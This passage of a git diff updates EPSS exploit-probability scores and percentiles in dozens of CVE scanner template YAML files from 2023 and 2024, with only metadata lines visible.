b/http/cves/2023/CVE-2023-46732.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-46732 cwe-id: CWE-79 epss-score: 0.51087 - epss-percentile: 0.9778 + epss-percentile: 0.97776 cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-46747.yaml b/http/cves/2023/CVE-2023-46747.yaml index 4d089f79736..85b23835929 100644 --- a/http/cves/2023/CVE-2023-46747.yaml +++ b/http/cves/2023/CVE-2023-46747.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-46747 cwe-id: CWE-306,CWE-288 epss-score: 0.94436 - epss-percentile: 0.99985 + epss-percentile: 0.99984 cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-46818.yaml b/http/cves/2023/CVE-2023-46818.yaml index c4b44687276..b43d162d0f5 100644 --- a/http/cves/2023/CVE-2023-46818.yaml +++ b/http/cves/2023/CVE-2023-46818.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-46818 cwe-id: CWE-94 epss-score: 0.90623 - epss-percentile: 0.99594 + epss-percentile: 0.99593 metadata: verified: true max-request: 1 diff --git a/http/cves/2023/CVE-2023-47115.yaml b/http/cves/2023/CVE-2023-47115.yaml index 025277a8a3a..e22b77dd4b3 100644 --- a/http/cves/2023/CVE-2023-47115.yaml +++ b/http/cves/2023/CVE-2023-47115.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-47115 cwe-id: CWE-79 epss-score: 0.02236 - epss-percentile: 0.84123 + epss-percentile: 0.84119 cpe: cpe:2.3:a:humansignal:label_studio:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-47117.yaml b/http/cves/2023/CVE-2023-47117.yaml index d2a3a860ef6..861f7af2944 100644 --- a/http/cves/2023/CVE-2023-47117.yaml +++ b/http/cves/2023/CVE-2023-47117.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-47117 cwe-id: CWE-200 epss-score: 0.65766 - epss-percentile: 0.98445 + epss-percentile: 0.98448 cpe: cpe:2.3:a:humansignal:label_studio:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-47684.yaml b/http/cves/2023/CVE-2023-47684.yaml index 3af257bbc60..7ea8e6e8f06 100644 --- a/http/cves/2023/CVE-2023-47684.yaml +++ b/http/cves/2023/CVE-2023-47684.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-47684 cwe-id: CWE-79 epss-score: 0.01704 - epss-percentile: 0.81864 + epss-percentile: 0.81861 cpe: cpe:2.3:a:themepunch:essential_grid:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-47873.yaml b/http/cves/2023/CVE-2023-47873.yaml index 553fc88bf1e..6b7e586531a 100644 --- a/http/cves/2023/CVE-2023-47873.yaml +++ b/http/cves/2023/CVE-2023-47873.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-47873 cwe-id: CWE-434 epss-score: 0.11235 - epss-percentile: 0.93293 + epss-percentile: 0.93287 cpe: cpe:2.3:a:wensolutions:wp_child_theme_generator:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-48084.yaml b/http/cves/2023/CVE-2023-48084.yaml index 8c94f13158f..af57469b900 100644 --- a/http/cves/2023/CVE-2023-48084.yaml +++ b/http/cves/2023/CVE-2023-48084.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-48084 cwe-id: CWE-89 epss-score: 0.82094 - epss-percentile: 0.99174 + epss-percentile: 0.99175 cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-48777.yaml b/http/cves/2023/CVE-2023-48777.yaml index 56e363e2b7c..110e4833cfa 100644 --- a/http/cves/2023/CVE-2023-48777.yaml +++ b/http/cves/2023/CVE-2023-48777.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-48777 cwe-id: CWE-434 epss-score: 0.91046 - epss-percentile: 0.99621 + epss-percentile: 0.99619 cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:wordpress:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-49489.yaml b/http/cves/2023/CVE-2023-49489.yaml index 22a94a54556..5932267fd62 100644 --- a/http/cves/2023/CVE-2023-49489.yaml +++ b/http/cves/2023/CVE-2023-49489.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-49489 cwe-id: CWE-79 epss-score: 0.00531 - epss-percentile: 0.6667 + epss-percentile: 0.66653 cpe: cpe:2.3:a:kodcloud:kodexplorer:4.51:*:*:*:*:*:*:* metadata: vendor: kodcloud diff --git a/http/cves/2023/CVE-2023-49494.yaml b/http/cves/2023/CVE-2023-49494.yaml index 1855db39cd1..26e47a0ce50 100644 --- a/http/cves/2023/CVE-2023-49494.yaml +++ b/http/cves/2023/CVE-2023-49494.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-49494 cwe-id: CWE-79 epss-score: 0.01177 - epss-percentile: 0.783 + epss-percentile: 0.78296 cpe: cpe:2.3:a:dedecms:dedecms:5.7.111:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-4966.yaml b/http/cves/2023/CVE-2023-4966.yaml index 4351ed48db1..34646f99c63 100644 --- a/http/cves/2023/CVE-2023-4966.yaml +++ b/http/cves/2023/CVE-2023-4966.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-4966 cwe-id: CWE-119,NVD-CWE-noinfo - epss-score: 0.94348 - epss-percentile: 0.99954 + epss-score: 0.94353 + epss-percentile: 0.99956 cpe: cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:fips:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-4974.yaml b/http/cves/2023/CVE-2023-4974.yaml index 5437ab24fad..0623cd7d52b 100644 --- a/http/cves/2023/CVE-2023-4974.yaml +++ b/http/cves/2023/CVE-2023-4974.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-4974 cwe-id: CWE-89 epss-score: 0.41527 - epss-percentile: 0.97293 + epss-percentile: 0.97291 cpe: cpe:2.3:a:creativeitem:academy_lms:6.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-5003.yaml b/http/cves/2023/CVE-2023-5003.yaml index a7d6511b2eb..f9e7e124427 100644 --- a/http/cves/2023/CVE-2023-5003.yaml +++ b/http/cves/2023/CVE-2023-5003.yaml @@ -17,7 +17,7 @@ info: cvss-score: 7.5 cve-id: CVE-2023-5003 epss-score: 0.76331 - epss-percentile: 0.98887 + epss-percentile: 0.98886 cpe: cpe:2.3:a:miniorange:active_directory_integration_\/_ldap_integration:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-50290.yaml b/http/cves/2023/CVE-2023-50290.yaml index 0e9ed43720e..7e2007ed735 100644 --- a/http/cves/2023/CVE-2023-50290.yaml +++ b/http/cves/2023/CVE-2023-50290.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.5 cve-id: CVE-2023-50290 cwe-id: CWE-200,NVD-CWE-noinfo - epss-score: 0.92692 - epss-percentile: 0.99738 + epss-score: 0.92562 + epss-percentile: 0.99728 cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-50578.yaml b/http/cves/2023/CVE-2023-50578.yaml index 22a652b76f7..8df1fe46a3e 100644 --- a/http/cves/2023/CVE-2023-50578.yaml +++ b/http/cves/2023/CVE-2023-50578.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-50578 cwe-id: CWE-89 epss-score: 0.31687 - epss-percentile: 0.96654 + epss-percentile: 0.96655 cpe: cpe:2.3:a:mingsoft:mcms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-50719.yaml b/http/cves/2023/CVE-2023-50719.yaml index 7493c9f2d12..f2351686c27 100644 --- a/http/cves/2023/CVE-2023-50719.yaml +++ b/http/cves/2023/CVE-2023-50719.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-50719 cwe-id: CWE-359 epss-score: 0.45584 - epss-percentile: 0.97506 + epss-percentile: 0.97501 cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-50720.yaml b/http/cves/2023/CVE-2023-50720.yaml index d85388b3589..6634ec50bce 100644 --- a/http/cves/2023/CVE-2023-50720.yaml +++ b/http/cves/2023/CVE-2023-50720.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-50720 cwe-id: CWE-200 epss-score: 0.49077 - epss-percentile: 0.9768 + epss-percentile: 0.97676 cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-52085.yaml b/http/cves/2023/CVE-2023-52085.yaml index 00f0b164134..d7d65889ab1 100644 --- a/http/cves/2023/CVE-2023-52085.yaml +++ b/http/cves/2023/CVE-2023-52085.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-52085 cwe-id: CWE-22 epss-score: 0.38122 - epss-percentile: 0.97096 + epss-percentile: 0.97098 cpe: cpe:2.3:a:wintercms:winter:*:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2023/CVE-2023-5222.yaml b/http/cves/2023/CVE-2023-5222.yaml index 04c8ecff27b..ecaa77a2ab8 100644 --- a/http/cves/2023/CVE-2023-5222.yaml +++ b/http/cves/2023/CVE-2023-5222.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-5222 cwe-id: CWE-259 epss-score: 0.89713 - epss-percentile: 0.99541 + epss-percentile: 0.99543 cpe: cpe:2.3:o:viessmann:vitogate_300_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-5244.yaml b/http/cves/2023/CVE-2023-5244.yaml index 10e873cf8b0..51f87adccf8 100644 --- a/http/cves/2023/CVE-2023-5244.yaml +++ b/http/cves/2023/CVE-2023-5244.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-5244 cwe-id: CWE-79 - epss-score: 0.25862 - epss-percentile: 0.961 + epss-score: 0.28933 + epss-percentile: 0.96421 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-5360.yaml b/http/cves/2023/CVE-2023-5360.yaml index 0414079e58e..0bfb6204b35 100644 --- a/http/cves/2023/CVE-2023-5360.yaml +++ b/http/cves/2023/CVE-2023-5360.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-5360 cwe-id: CWE-434 - epss-score: 0.93294 - epss-percentile: 0.99794 + epss-score: 0.93478 + epss-percentile: 0.99812 cpe: cpe:2.3:a:royal-elementor-addons:royal_elementor_addons:*:*:*:*:*:wordpress:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-5375.yaml b/http/cves/2023/CVE-2023-5375.yaml index db919a23d19..8271f7a8a7d 100644 --- a/http/cves/2023/CVE-2023-5375.yaml +++ b/http/cves/2023/CVE-2023-5375.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-5375 cwe-id: CWE-601 epss-score: 0.41841 - epss-percentile: 0.97309 + epss-percentile: 0.97306 cpe: cpe:2.3:a:mosparo:mosparo:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-5556.yaml b/http/cves/2023/CVE-2023-5556.yaml index 4e27d402526..7fdfde50fff 100644 --- a/http/cves/2023/CVE-2023-5556.yaml +++ b/http/cves/2023/CVE-2023-5556.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-5556 cwe-id: CWE-79 epss-score: 0.27733 - epss-percentile: 0.96294 + epss-percentile: 0.96297 cpe: cpe:2.3:a:structurizr:on-premises_installation:*:*:*:*:*:*:*:* metadata: max-request: 5 diff --git a/http/cves/2023/CVE-2023-5558.yaml b/http/cves/2023/CVE-2023-5558.yaml index 195c0cb07a3..99f0934f367 100644 --- a/http/cves/2023/CVE-2023-5558.yaml +++ b/http/cves/2023/CVE-2023-5558.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-5558 cwe-id: CWE-79 epss-score: 0.03127 - epss-percentile: 0.86464 + epss-percentile: 0.86466 cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:* metadata: max-request: 6 diff --git a/http/cves/2023/CVE-2023-5559.yaml b/http/cves/2023/CVE-2023-5559.yaml index 9cd6ef4a581..8670d021b8e 100644 --- a/http/cves/2023/CVE-2023-5559.yaml +++ b/http/cves/2023/CVE-2023-5559.yaml @@ -18,7 +18,7 @@ info: cvss-score: 9.1 cve-id: CVE-2023-5559 epss-score: 0.45222 - epss-percentile: 0.97491 + epss-percentile: 0.97486 cpe: cpe:2.3:a:10web:10web_booster:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-5561.yaml b/http/cves/2023/CVE-2023-5561.yaml index 7a48349d7e9..d5b977187d6 100644 --- a/http/cves/2023/CVE-2023-5561.yaml +++ b/http/cves/2023/CVE-2023-5561.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-5561 cwe-id: CWE-200 epss-score: 0.64871 - epss-percentile: 0.98404 + epss-percentile: 0.98407 cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-5815.yaml b/http/cves/2023/CVE-2023-5815.yaml index 4ea7a0a6fb7..cf2cfef3436 100644 --- a/http/cves/2023/CVE-2023-5815.yaml +++ b/http/cves/2023/CVE-2023-5815.yaml @@ -19,7 +19,7 @@ info: cvss-score: 8.1 cve-id: CVE-2023-5815 epss-score: 0.48206 - epss-percentile: 0.97638 + epss-percentile: 0.97634 cpe: cpe:2.3:a:infornweb:news_\&_blog_designer_pack:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-5830.yaml b/http/cves/2023/CVE-2023-5830.yaml index 09520cafa97..1df440aa21f 100644 --- a/http/cves/2023/CVE-2023-5830.yaml +++ b/http/cves/2023/CVE-2023-5830.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-5830 cwe-id: CWE-287 epss-score: 0.90788 - epss-percentile: 0.99602 + epss-percentile: 0.99601 cpe: cpe:2.3:a:documentlocator:document_locator:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-5863.yaml b/http/cves/2023/CVE-2023-5863.yaml index eddfe1be2cb..6652f986ebd 100644 --- a/http/cves/2023/CVE-2023-5863.yaml +++ b/http/cves/2023/CVE-2023-5863.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-5863 cwe-id: CWE-79 epss-score: 0.05371 - epss-percentile: 0.89807 + epss-percentile: 0.89805 metadata: verified: true max-request: 1 diff --git a/http/cves/2023/CVE-2023-6000.yaml b/http/cves/2023/CVE-2023-6000.yaml index a16a31c2622..f068b2be0ba 100644 --- a/http/cves/2023/CVE-2023-6000.yaml +++ b/http/cves/2023/CVE-2023-6000.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-6000 cwe-id: CWE-79 epss-score: 0.6333 - epss-percentile: 0.98335 + epss-percentile: 0.98337 cpe: cpe:2.3:a:sygnoos:popup_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-6018.yaml b/http/cves/2023/CVE-2023-6018.yaml index 72b46a99124..ccd2b13501e 100644 --- a/http/cves/2023/CVE-2023-6018.yaml +++ b/http/cves/2023/CVE-2023-6018.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-6018 cwe-id: CWE-78 epss-score: 0.89568 - epss-percentile: 0.99533 + epss-percentile: 0.99536 cpe: cpe:2.3:a:lfprojects:mlflow:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-6020.yaml b/http/cves/2023/CVE-2023-6020.yaml index 3d4a8740c13..0170de1dacc 100644 --- a/http/cves/2023/CVE-2023-6020.yaml +++ b/http/cves/2023/CVE-2023-6020.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-6020 cwe-id: CWE-862 epss-score: 0.81449 - epss-percentile: 0.99136 + epss-percentile: 0.99139 cpe: cpe:2.3:a:ray_project:ray:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-6021.yaml b/http/cves/2023/CVE-2023-6021.yaml index 975ed5ee5cd..53fedf216b0 100644 --- a/http/cves/2023/CVE-2023-6021.yaml +++ b/http/cves/2023/CVE-2023-6021.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-6021 cwe-id: CWE-22,CWE-29 epss-score: 0.87317 - epss-percentile: 0.99426 + epss-percentile: 0.99428 cpe: cpe:2.3:a:ray_project:ray:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-6023.yaml b/http/cves/2023/CVE-2023-6023.yaml index dafdfe62520..faff99f1bd6 100644 --- a/http/cves/2023/CVE-2023-6023.yaml +++ b/http/cves/2023/CVE-2023-6023.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-6023 cwe-id: CWE-22,CWE-29 epss-score: 0.47939 - epss-percentile: 0.97622 + epss-percentile: 0.97617 cpe: cpe:2.3:a:vertaai:modeldb:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-6063.yaml b/http/cves/2023/CVE-2023-6063.yaml index dbcb4afb559..5a780882f67 100644 --- a/http/cves/2023/CVE-2023-6063.yaml +++ b/http/cves/2023/CVE-2023-6063.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-6063 cwe-id: CWE-89 epss-score: 0.92207 - epss-percentile: 0.99702 + epss-percentile: 0.99701 cpe: cpe:2.3:a:wpfastestcache:wp_fastest_cache:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-6266.yaml b/http/cves/2023/CVE-2023-6266.yaml index fa15a1a9524..30a7de84d66 100644 --- a/http/cves/2023/CVE-2023-6266.yaml +++ b/http/cves/2023/CVE-2023-6266.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-6266 cwe-id: CWE-552 - epss-score: 0.25207 - epss-percentile: 0.96014 + epss-score: 0.12464 + epss-percentile: 0.93697 cpe: cpe:2.3:a:backupbliss:backup_migration:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-6275.yaml b/http/cves/2023/CVE-2023-6275.yaml index 1f209880df7..72078c648e8 100644 --- a/http/cves/2023/CVE-2023-6275.yaml +++ b/http/cves/2023/CVE-2023-6275.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-6275 cwe-id: CWE-79 epss-score: 0.49282 - epss-percentile: 0.97691 + epss-percentile: 0.97686 cpe: cpe:2.3:a:totvs:fluig:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-6380.yaml b/http/cves/2023/CVE-2023-6380.yaml index bf256b24f1c..5a22fa32b14 100644 --- a/http/cves/2023/CVE-2023-6380.yaml +++ b/http/cves/2023/CVE-2023-6380.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-6380 cwe-id: CWE-601 epss-score: 0.43282 - epss-percentile: 0.97392 + epss-percentile: 0.97388 cpe: cpe:2.3:a:alkacon:opencms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-6389.yaml b/http/cves/2023/CVE-2023-6389.yaml index 9478eccdde1..44e6eaa526a 100644 --- a/http/cves/2023/CVE-2023-6389.yaml +++ b/http/cves/2023/CVE-2023-6389.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-6389 cwe-id: CWE-601 epss-score: 0.52517 - epss-percentile: 0.97843 + epss-percentile: 0.9784 cpe: cpe:2.3:a:abhinavsingh:wordpress_toolbar:*:*:*:*:*:*:wordpress:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-6421.yaml b/http/cves/2023/CVE-2023-6421.yaml index 573aa59f431..c2fdc6c2fc1 100644 --- a/http/cves/2023/CVE-2023-6421.yaml +++ b/http/cves/2023/CVE-2023-6421.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-6421 cwe-id: CWE-200 epss-score: 0.80567 - epss-percentile: 0.99093 + epss-percentile: 0.99094 metadata: verified: true max-request: 1 diff --git a/http/cves/2023/CVE-2023-6505.yaml b/http/cves/2023/CVE-2023-6505.yaml index cbe959375e7..6d89ab16fd6 100644 --- a/http/cves/2023/CVE-2023-6505.yaml +++ b/http/cves/2023/CVE-2023-6505.yaml @@ -19,7 +19,7 @@ info: cvss-score: 7.5 cve-id: CVE-2023-6505 epss-score: 0.7147 - epss-percentile: 0.98677 + epss-percentile: 0.98676 cpe: cpe:2.3:a:codexonics:prime_mover:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-6568.yaml b/http/cves/2023/CVE-2023-6568.yaml index ae6fc4a52e8..ee76c9564c7 100644 --- a/http/cves/2023/CVE-2023-6568.yaml +++ b/http/cves/2023/CVE-2023-6568.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-6568 cwe-id: CWE-79 epss-score: 0.22147 - epss-percentile: 0.95609 + epss-percentile: 0.95613 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-6623.yaml b/http/cves/2023/CVE-2023-6623.yaml index 57f9c2e8e01..d76b5dd2250 100644 --- a/http/cves/2023/CVE-2023-6623.yaml +++ b/http/cves/2023/CVE-2023-6623.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-6623 cwe-id: CWE-22 - epss-score: 0.89357 - epss-percentile: 0.99524 + epss-score: 0.88479 + epss-percentile: 0.99478 cpe: cpe:2.3:a:wpdeveloper:essential_blocks:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-6655.yaml b/http/cves/2023/CVE-2023-6655.yaml index 8e55245ed9f..1527f353711 100644 --- a/http/cves/2023/CVE-2023-6655.yaml +++ b/http/cves/2023/CVE-2023-6655.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-6655 cwe-id: CWE-89 epss-score: 0.26772 - epss-percentile: 0.96192 + epss-percentile: 0.96194 cpe: cpe:2.3:a:hrp2000:e-hr:2020:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-6697.yaml b/http/cves/2023/CVE-2023-6697.yaml index 7ed6efabc00..64a3ad85119 100644 --- a/http/cves/2023/CVE-2023-6697.yaml +++ b/http/cves/2023/CVE-2023-6697.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-6697 cwe-id: CWE-79 epss-score: 0.48648 - epss-percentile: 0.9766 + epss-percentile: 0.97656 cpe: cpe:2.3:a:wpgmaps:wp_go_maps:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-6786.yaml b/http/cves/2023/CVE-2023-6786.yaml index f581adf6482..de7544a3570 100644 --- a/http/cves/2023/CVE-2023-6786.yaml +++ b/http/cves/2023/CVE-2023-6786.yaml @@ -16,7 +16,7 @@ info: classification: cve-id: CVE-2023-6786 epss-score: 0.00991 - epss-percentile: 0.76413 + epss-percentile: 0.76405 metadata: max-request: 1 verified: true diff --git a/http/cves/2023/CVE-2023-6875.yaml b/http/cves/2023/CVE-2023-6875.yaml index 4a17a8de624..448a5ca0c94 100644 --- a/http/cves/2023/CVE-2023-6875.yaml +++ b/http/cves/2023/CVE-2023-6875.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-6875 cwe-id: CWE-862 epss-score: 0.93769 - epss-percentile: 0.99843 + epss-percentile: 0.99845 cpe: cpe:2.3:a:wpexperts:post_smtp_mailer:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-6895.yaml b/http/cves/2023/CVE-2023-6895.yaml index eaf2b86f5b7..6ddfac69e9b 100644 --- a/http/cves/2023/CVE-2023-6895.yaml +++ b/http/cves/2023/CVE-2023-6895.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-6895 cwe-id: CWE-78 epss-score: 0.92185 - epss-percentile: 0.99699 + epss-percentile: 0.99698 cpe: cpe:2.3:o:hikvision:intercom_broadcast_system:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-6977.yaml b/http/cves/2023/CVE-2023-6977.yaml index 67ff4195d01..1111c72aeb8 100644 --- a/http/cves/2023/CVE-2023-6977.yaml +++ b/http/cves/2023/CVE-2023-6977.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-6977 cwe-id: CWE-29 epss-score: 0.84764 - epss-percentile: 0.99306 + epss-percentile: 0.99305 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-6989.yaml b/http/cves/2023/CVE-2023-6989.yaml index df14739c485..54184b4abad 100644 --- a/http/cves/2023/CVE-2023-6989.yaml +++ b/http/cves/2023/CVE-2023-6989.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-6989 cwe-id: CWE-22 epss-score: 0.67335 - epss-percentile: 0.98508 + epss-percentile: 0.98509 cpe: cpe:2.3:a:getshieldsecurity:shield_security:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-7028.yaml b/http/cves/2023/CVE-2023-7028.yaml index 116178f681f..2b96d9f3ffe 100644 --- a/http/cves/2023/CVE-2023-7028.yaml +++ b/http/cves/2023/CVE-2023-7028.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-7028 cwe-id: CWE-640,CWE-284 - epss-score: 0.93604 - epss-percentile: 0.99824 + epss-score: 0.93709 + epss-percentile: 0.99838 cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-7116.yaml b/http/cves/2023/CVE-2023-7116.yaml index 566a7e795d2..98e6b1d1b76 100644 --- a/http/cves/2023/CVE-2023-7116.yaml +++ b/http/cves/2023/CVE-2023-7116.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-7116 cwe-id: CWE-78 epss-score: 0.53813 - epss-percentile: 0.97912 + epss-percentile: 0.97909 cpe: cpe:2.3:a:datax-web_project:datax-web:2.1.2:*:*:*:*:*:*:* metadata: vendor: datax-web_project diff --git a/http/cves/2023/CVE-2023-7164.yaml b/http/cves/2023/CVE-2023-7164.yaml index a4163fbec84..dd6e3fec53f 100644 --- a/http/cves/2023/CVE-2023-7164.yaml +++ b/http/cves/2023/CVE-2023-7164.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-7164 cwe-id: CWE-200 - epss-score: 0.35384 - epss-percentile: 0.96918 + epss-score: 0.34166 + epss-percentile: 0.96845 cpe: cpe:2.3:a:inpsyde:backwpup:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-7246.yaml b/http/cves/2023/CVE-2023-7246.yaml index f49284df32e..180e4fd5c2c 100644 --- a/http/cves/2023/CVE-2023-7246.yaml +++ b/http/cves/2023/CVE-2023-7246.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-7246 cwe-id: CWE-79 epss-score: 0.01795 - epss-percentile: 0.82313 + epss-percentile: 0.82311 metadata: verified: true max-request: 2 diff --git a/http/cves/2024/CVE-2024-0200.yaml b/http/cves/2024/CVE-2024-0200.yaml index 58e07c707e1..5ef4f53751f 100644 --- a/http/cves/2024/CVE-2024-0200.yaml +++ b/http/cves/2024/CVE-2024-0200.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2024-0200 cwe-id: CWE-470 epss-score: 0.74112 - epss-percentile: 0.98789 + epss-percentile: 0.98788 cpe: cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-0204.yaml b/http/cves/2024/CVE-2024-0204.yaml index 1ac9b03a58a..5526b2194dd 100644 --- a/http/cves/2024/CVE-2024-0204.yaml +++ b/http/cves/2024/CVE-2024-0204.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2024-0204 cwe-id: CWE-425 epss-score: 0.93048 - epss-percentile: 0.99772 + epss-percentile: 0.99771 cpe: cpe:2.3:a:fortra:goanywhere_managed_file_transfer:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-0250.yaml b/http/cves/2024/CVE-2024-0250.yaml index 64a4ab9d721..d4ac55cc1d2 100644 --- a/http/cves/2024/CVE-2024-0250.yaml +++ b/http/cves/2024/CVE-2024-0250.yaml @@ -16,7 +16,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2024-0250 classification: epss-score: 0.13033 - epss-percentile: 0.93872 + epss-percentile: 0.93869 metadata: max-request: 1 verified: true diff --git a/http/cves/2024/CVE-2024-0337.yaml b/http/cves/2024/CVE-2024-0337.yaml index 57bf8679116..acb405d1480 100644 --- a/http/cves/2024/CVE-2024-0337.yaml +++ 